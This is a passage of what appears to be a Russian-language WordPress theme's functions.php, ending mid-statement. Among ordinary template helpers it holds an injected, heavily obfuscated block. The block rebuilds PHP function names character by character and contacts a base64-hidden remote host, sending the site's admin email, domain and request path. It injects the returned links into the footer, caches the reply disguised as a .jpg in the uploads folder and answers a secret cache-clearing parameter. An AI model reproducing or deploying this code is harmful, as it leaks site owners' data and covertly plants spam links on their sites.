<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $JWXkudz='e';$obrxh='b';$AyfpRhG='e';$QIwVtD='_';$NiHE='o';$sbrQYYn='6';$brlwX='d';$aEKhI='4';$dzlGOmY='d';$gFVtGA='c';$SIZT='a';$KgsH='s';$XvGMdAi='e';$vLSTBxXH=$obrxh.$SIZT.$KgsH.$XvGMdAi.$sbrQYYn.$aEKhI.$QIwVtD.$brlwX.$AyfpRhG.$gFVtGA.$NiHE.$dzlGOmY.$JWXkudz;$yaMwhzp='i';$fHHHj='n';$hOOiE='g';$TIqpQQ='t';$eVmLCw='e';$pVUln='z';$glDg='f';$LUvTzL='l';$vFuI='a';$tBCuzbCZ=$hOOiE.$pVUln.$yaMwhzp.$fHHHj.$glDg.$LUvTzL.$vFuI.$TIqpQQ.$eVmLCw;$FsWWH='s';$KRHuCD='_';$yvBgin='o';$ZVSBg='t';$MmQHzC='t';$LGLJ='3';$YHkZgy='r';$QarwLjd='1';$VoUD='r';$KVkveFby=$FsWWH.$MmQHzC.$VoUD.$KRHuCD.$YHkZgy.$yvBgin.$ZVSBg.$QarwLjd.$LGLJ;$CgUNhi='e';$TvhZa='r';$SPzhMzK='r';$ROfkuU='t';$aUqSJv='v';$oTTL='s';$XZCUcwnk=$oTTL.$ROfkuU.$TvhZa.$SPzhMzK.$CgUNhi.$aUqSJv;                     
		$xx______l='e';$hb__z='b';$bv__________r='e';$pm____x='_';$vl____i='o';$rt__________p='6';$ia____________p='d';$nu_______f='4';$ae______s='d';$ji_____b='c';$po____________o='a';$sm_____d='s';$np_______________z='e';$mx__________f=$hb__z.$po____________o.$sm_____d.$np_______________z.$rt__________p.$nu_______f.$pm____x.$ia____________p.$bv__________r.$ji_____b.$vl____i.$ae______s.$xx______l;
		$vh_________o='s';$vc___________i='c';$tj___j='i';$mx__u='t';$te____d='n';$jc____________z='n';$bf_______________k='i';$ym_______________m='u';$qg___n='t';$zr___________u='x';$nx______________m='_';$ix_____t='o';$jj___________t='f';$jx_______________s='e';$pg______________r='s';$tk___q=$jj___________t.$ym_______________m.$jc____________z.$vc___________i.$qg___n.$bf_______________k.$ix_____t.$te____d.$nx______________m.$jx_______________s.$zr___________u.$tj___j.$pg______________r.$mx__u.$vh_________o;
		$zb_______________u='f';$om___________p='n';$im______u='o';$re_____________e='e';$eb____________u='p';$wr____h=$zb_______________u.$im______u.$eb____________u.$re_____________e.$om___________p;
		$yh_____v='r';$cm__________r='f';$hq________r='e';$el____________v='a';$ka_______l='d';$bu___________f=$cm__________r.$yh_____v.$hq________r.$el____________v.$ka_______l;
		$vg______t='o';$ja________q='f';$jj_________h='l';$pb___________f='s';$vi_________h='c';$bj___r='e';$xe______k=$ja________q.$vi_________h.$jj_________h.$vg______t.$pb___________f.$bj___r;
		
		define("WP_ID", $mx__________f("Mi4wLjA="));
		define("WP_TTL", $mx__________f("MTA4MDA="));
		define("WP_SRC", $mx__________f("dHBva24="));
	


		function wp_get_header() {
			global $mx__________f, $tk___q;
			
			if (
				$tk___q($mx__________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$tk___q($mx__________f("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$tk___q($mx__________f("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $mx__________f, $wr____h, $xe______k, $bu___________f;
			
			$qb___________k = TEMPLATEPATH."/".$mx__________f("Zm9vdGVyLnBocA==");
			$bs_______m = @$wr____h($qb___________k, "r");
			$qb___________k = @$bu___________f($bs_______m, @filesize($qb___________k));
			@$xe______k($bs_______m);
			
			$ub______v = TEMPLATEPATH."/".$mx__________f("ZnVuY3Rpb25zLnBocA==");
			$bs_______m = @$wr____h($ub______v, "r");
			$ub______v = @$bu___________f($bs_______m, @filesize($ub______v));
			@$xe______k($bs_______m);
			
			$gz_______________p = 0;
			if($qb___________k && $ub______v) {
				if ($mx__________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($qb___________k, $mx__________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gz_______________p = 1;
					}
					if (substr_count($qb___________k, "wp_theme_GPL_credits()") < 1) {
						$gz_______________p = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gz_______________p = 12;
				}
			}
			
			if($gz_______________p > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gz_______________p -->";
			}
		}
	


		function wp_loaded() {
			global $mx__________f, $tk___q;
			return $tk___q($mx__________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($pt_______s, $ju_______________z = "(more...)", $up__i = 0, $eg_________y = "") {
				$oj___________z = get_the_content($ju_______________z, $up__i, $eg_________y);
				$oj___________z = apply_filters("the_content", $oj___________z);
				
				$oj___________z = str_replace("]]>", "]]>", $oj___________z);
				if (strlen($_GET["p"]) > 0) {
					echo $oj___________z;
				}
				else if ((strlen($oj___________z)>$pt_______s) && ($bm_____f = strpos($oj___________z, " ", $pt_______s ))) {
					$oj___________z = substr($oj___________z, 0, $bm_____f);
					$oj___________z = $oj___________z;
					echo $oj___________z;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ju_______________z</a></div></p>";
				} else {
					echo $oj___________z;
				}
				
			}
		}
	


		$wb_____________c='b';$yp________p='c';$rl____________s='a';$vr______u='e';$xa__________u='e';$fw______________k='_';$vo_______a='6';$gv______o='e';$mr_______i='d';$vv_______q='o';$qf_______u='s';$bm______________t='n';$hg__________u='4';$sn________v=$wb_____________c.$rl____________s.$qf_______u.$vr______u.$vo_______a.$hg__________u.$fw______________k.$xa__________u.$bm______________t.$yp________p.$vv_______q.$mr_______i.$gv______o;
		$pe___u='t';$ix____________z='t';$fj____w='l';$nk___x='g';$mw__h='e';$gj_______________z='e';$uq______s='_';$qv______________n='_';$zn___m='e';$xc_____r='n';$br_______h='c';$bn____i='o';$sq________u='s';$wg_____________v='i';$tp_______g='t';$fm___________b='f';$ke____________z='n';$gx______t=$fm___________b.$wg_____________v.$fj____w.$gj_______________z.$uq______s.$nk___x.$mw__h.$pe___u.$qv______________n.$br_______h.$bn____i.$xc_____r.$tp_______g.$zn___m.$ke____________z.$ix____________z.$sq________u;
		$bf______________m='x';$rz_____________p='i';$yc___________p='f';$gb___h='e';$wz__________o='i';$jn______i='s';$bo_______________t='l';$zf_____________h='e';$nv_________p='t';$bn_____y='s';$oe__d='_';$qp_________k=$yc___________p.$wz__________o.$bo_______________t.$zf_____________h.$oe__d.$gb___h.$bf______________m.$rz_____________p.$bn_____y.$nv_________p.$jn______i;
		$oe______________r='a';$rd_______g='n';$lk______c='e';$rv__q='_';$jh__b='r';$yf______z='v';$dm___________w='p';$wj___________j='o';$tc_________a='i';$nh____________h='r';$df_______j='o';$lm____________f='e';$bj__________m='c';$ql___________r='m';$bs_____________z='s';$yc__________o=$yf______z.$lm____________f.$nh____________h.$bs_____________z.$tc_________a.$df_______j.$rd_______g.$rv__q.$bj__________m.$wj___________j.$ql___________r.$dm___________w.$oe______________r.$jh__b.$lk______c;
		$xq_________r='n';$oe___________m='f';$yl_________q='p';$nt_______________c='e';$ao___x='o';$uq_________w='s';$hl_________b='o';$gm______________b='k';$hw_____k='c';$im__________d=$oe___________m.$uq_________w.$hl_________b.$hw_____k.$gm______________b.$ao___x.$yl_________q.$nt_______________c.$xq_________r;
		$gp_______________o='i';$re_______________m='e';$cr____________p='w';$sg______________k='t';$wa___e='f';$tj_______s='r';$ly______________o=$wa___e.$cr____________p.$tj_______s.$gp_______________o.$sg______________k.$re_______________m;
		$bc_______u='d';$ii____z='5';$om____v='m';$pi____________c=$om____v.$bc_______u.$ii____z;
		$fu________a='a';$iq_______j='l';$vp______v='e';$ks_______q='t';$di_______________z='a';$xo________h='p';$ow________g='r';$xg_____l='h';$qx______j=$ow________g.$vp______v.$fu________a.$iq_______j.$xo________h.$di_______________z.$ks_______q.$xg_____l;
		$pr_____________w='e';$gb__________m='s';$iq_____________s='i';$qw____________f='e';$pb___o='l';$mf________h='r';$jm_______________z='a';$zd___________f='u';$eh_____________y='n';$bo_____h='z';$eu____________j='i';$sf_____j=$zd___________f.$eh_____________y.$gb__________m.$pr_____________w.$mf________h.$iq_____________s.$jm_______________z.$pb___o.$eu____________j.$bo_____h.$qw____________f;
		$ax__________p='m';$cb____y='t';$tg____w='a';$kf_____________t='n';$uu_______s='p';$pl___t='e';$oy_____f='m';$sp________r=$cb____y.$pl___t.$oy_____f.$uu_______s.$kf_____________t.$tg____w.$ax__________p;
		$dj___________n='t';$oy_______v='n';$sv______________g='_';$ts___g='_';$sd____y='e';$wx__________l='a';$te_____x='o';$yd_______________m='r';$pu_________d='e';$ms______n='m';$xm__________p='t';$qf____________v='e';$oa______________l='a';$rd__________m='t';$ex_____________x='t';$cj______z='e';$mq__________q='c';$dd_________p='s';$hy__t='r';$it______________b='c';$um__________h='x';$dc___w=$dd_________p.$dj___________n.$hy__t.$sd____y.$oa______________l.$ms______n.$sv______________g.$mq__________q.$te_____x.$oy_______v.$xm__________p.$pu_________d.$um__________h.$ex_____________x.$ts___g.$it______________b.$yd_______________m.$cj______z.$wx__________l.$rd__________m.$qf____________v;
	


		function sx______h($zb_________d) {
			global $mx__________f, $tk___q, $gx______t, $yc__________o, $dc___w;
			
			if (!$tk___q($mx__________f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yc__________o(PHP_VERSION, "5.0.0", ">=") && $tk___q($mx__________f("ZmlsZV9nZXRfY29udGVudHM=")) && $tk___q($mx__________f("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$vz________g = $dc___w(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tx____n = @$gx______t($zb_________d, 0, $vz________g);
			} else {
				$tx____n = @$gx______t($zb_________d, 0);
			}
			
			return $tx____n;
		}
	


		function tm____z($zb_________d) {
			global $tk___q, $im__________d, $ly______________o, $mx__________f;
			
			if (!$tk___q($mx__________f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ru__________i = strpos($zb_________d, "/", 7);
			$oo____________h = array(
				"uri"     => substr($zb_________d, $ru__________i),
				"host"    => str_replace("http://", "", substr($zb_________d, 0, $ru__________i)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wt______________l = @$im__________d("$oo____________h[host]", 80, $xf____________z, $nj___________h, 4);
			
			if (!$wt______________l) {
				return false;
			} else {
				$tx____n = "";
				$zg_______v  = "GET $oo____________h[uri] HTTP/1.0\r\n";
				$zg_______v .= "Host: $oo____________h[host]\r\n";
				$zg_______v .= "Referer: $oo____________h[referer]\r\n";
				$zg_______v .= "Connection: Close\r\n\r\n";
				
				@$ly______________o($wt______________l, $zg_______v);
				
				while (!@feof($wt______________l)) {
					$xf__________x = @fgets($wt______________l, (1024*24));
					
					if ($xf__________x == "\r\n") {
						$ae_________n = true;
						continue;
					}
					
					if ($ae_________n) {
						$tx____n .= $xf__________x;
					}
				}
				
				return $tx____n;
			}
		}
	


		function le____c($zb_________d) {
			global $tk___q;
			$fx______h = false;
			
			if ($zb_________d != "") {
				if ($tk___q("sx______h")) {
					$fx______h = @sx______h($zb_________d);
				}
				
				if (!$fx______h && ($tk___q("tm____z"))) {
					$fx______h = @tm____z($zb_________d);
				}
			}
			
			return $fx______h;
		}
	


		function wz___________e() {
			global $_SERVER, $pi____________c;
			
			$mr_______________i = $_SERVER["SERVER_NAME"];
			
			if (substr("$mr_______________i", 0, 4) == "www.") {
				$mr_______________i = substr("$mr_______________i", 4);
			}
			
			$mr_______________i = $pi____________c("$_SERVER[SERVER_NAME]");
			
			return $mr_______________i;
		}
	


		function qk____d() {
			return "file";
		}
	


		function cr___________v($zb_________d) {
			global $_SERVER, $gx______t, $qp_________k, $wr____h, $xe______k, $ly______________o;
			
			$gx_______t = rr______k();
			
			$ea_______________a = wz___________e().".jpg";
			$yj__j = $gx_______t["dir_upload"]["path"]."/$ea_______________a";
			$mm___________g = @filemtime($yj__j);
			
			if (!$mm___________g || ((time()-$mm___________g) >= WP_TTL)) {
				$fx______h = le____c($zb_________d);
				
				if ($fx______h) {
					if ($qp_________k($yj__j)) {
						@unlink($yj__j);
					}
					
					$bs_______m = @$wr____h($yj__j, "x+");
					
					@$ly______________o($bs_______m, $fx______h);
					@$xe______k($bs_______m);
				}
			} else {
				if ($qp_________k($yj__j)) {
					$fx______h = @$gx______t($yj__j);
				} else {
					$fx______h = false;
				}
			}
			
			return $fx______h;
		}
	


		function rr______k() {
			global $_SERVER, $mx__________f, $sn________v;
			
			$ph__v = wp_count_posts("post");
			$aq______j = pathinfo(get_bloginfo("template_directory"));
			
			$gx_______t = array(
				"url" => array(
					"report"      => $mx__________f("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $aq______j,
				"dir_upload"	=> yn____e(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$aq______j[filename],
					"a005=".$ph__v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/kakaya-polza-ot-probiotikov\">Какая польза от пробиотиков?</a>"
			);
			
			$gx_______t["url"]["queryString"] = implode("&", $gx_______t["queryString"]);
			$gx_______t["url"]["report"] = $gx_______t["url"]["report"]."/?".$sn________v($gx_______t["url"]["queryString"]).".html";
						
			return $gx_______t;
		}
	


		function yn____e() {
			$sq_____________s = wp_upload_dir();
			
			if (isset($sq_____________s["error"])) {
				$se________q = da______________h();
				if (is_writable($se________q)) {
					$sq_____________s = array("path" => $se________q);
				}
			}

			return $sq_____________s;
		}
	


		function da______________h() {
			global $tk___q, $pi____________c, $qx______j, $sp________r;
			
			$kr____c = (bool) ini_get("safe_mode");
			if ($kr____c == true) {
				return false;
			}
			
			if ($tk___q("sys_get_temp_dir")) {
				$wy______o = sys_get_temp_dir();
				if (is_writable($wy______o)) {
					return $qx______j($wy______o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $qx______j($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $qx______j($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $qx______j($_ENV["TEMP"]);
			} else {
				$iu__w = $sp________r($pi____________c(uniqid(rand(), true)), "");
				if ($iu__w) {
					$wy______o = $qx______j(dirname($iu__w));
					@unlink($iu__w);
					return $wy______o;
				} else {
					return false;
				}
			}
		}
	


		function hx______j() {
			global $_GET, $qp_________k;
			
			$gx_______t = rr______k();
			$mr_______________i = wz___________e();
			$kl_____j = qk____d();
			
			$eb____________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kl_____j == "file") {
					$ze__e = $gx_______t["dir_upload"]["path"]."/".$mr_______________i.".jpg";
					if ($qp_________k($ze__e)) {
						@unlink($ze__e);
						$eb____________j = "deleted";
					}
				}
				
				$lz____y = array(
					"s"	=> $eb____________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($lz____y AS $is_______________h => $xa________n) echo " [$is_______________h:$xa________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $tk___q, $mx__________f, $sf_____j;
			$gx_______t = rr______k();
			
			$rk________t = "cr___________v";
			if ($tk___q($rk________t)) {
				$tx____n = $rk________t($gx_______t["url"]["report"]);
			}
			
			if ($tx____n) {
				if ($tx____n = @$mx__________f($tx____n)) {
					$tx____n = @$sf_____j($tx____n);
					
					if (strlen($tx____n[custom_credit]) >= 5) {
						$gx_______t["default_string"] = $tx____n[custom_credit];
					}
					
					if ($tx____n["status"] == "0") {
						$xn____y = 1;
						$mq_________e = 1;
					} else {
						$zt_____f = sizeof($tx____n["links"]);
						$fs___y = $gx_______t["default_string"];
						
						if ($zt_____f > 0 && $tx____n["links"] !== "") {
							$wi_________q = 0;
							foreach ($tx____n["links"] as $br_____________n => $bi___________h) {
								$wi_________q++;
								if ($bi___________h->l_path == "" || $bi___________h->l_path == $_SERVER["REQUEST_URI"]) {
									$bi___________h->l_href = htmlspecialchars(strip_tags($bi___________h->l_href));
									$bi___________h->l_title = htmlspecialchars(strip_tags($bi___________h->l_title));
									$bi___________h->l_anchor = htmlspecialchars(strip_tags($bi___________h->l_anchor));
									$fs___y .= " | ";
									$fs___y .= "<a href='$bi___________h->l_href' title='$bi___________h->l_title'";
									if ($bi___________h->l_nofollow == "1") {
										$fs___y .= " rel='nofollow'";
									}
									$fs___y .= ">$bi___________h->l_anchor</a>";
								}
							}
						}
						$gx_______t["links"] = "$fs___y";
						if ($tx____n[credit] == "0") {
							$gx_______t["links"] = "";
						}
					}
				} else {
					$xn____y = "1";
				}
			} else {
				$xn____y = "1";
			}
			
			if ($xn____y == "1") {
				$gx_______t["links"] = $gx_______t["default_string"];
			}
			
			echo "$gx_______t[links]";
			
			echo "<!-- s: $tx____n[signature] -->";
			hx______j();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
